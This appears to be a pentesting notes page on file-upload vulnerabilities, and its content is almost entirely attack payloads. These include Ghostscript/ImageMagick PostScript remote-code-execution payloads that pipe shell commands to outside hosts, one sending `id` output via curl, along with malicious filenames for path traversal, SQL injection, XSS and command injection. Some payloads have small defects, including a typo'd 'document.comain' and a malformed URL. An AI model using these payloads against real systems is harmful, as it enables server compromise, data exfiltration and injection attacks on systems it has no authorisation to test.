File Upload
Blogs / Articles:
Writeups:
Tools:
Burp Suite Extension - Upload Scanner
Cheatsheets:
Payloads:
Imagemagick RCE:
%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%curl${IFS}zero-way.net/cc`id`) currentdevice
putdeviceprops
%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%wget http://https://helloworld.free.beeceptor.com) currentdevice
putdeviceprops
Tweets:



Chaining file uploads with other vulns:-
Set filename to:-
> ../../../tmp/lol.png for path traversals
> sleep(10)-- -.jpg for SQLi.
> <svg onload=alert(document.comain)>.jpg/png for xss
> ; sleep 10; for command injections
Bug: XSS through file upload.
Payload: */alert(1)</script><script>/*
Last updated
Was this helpful?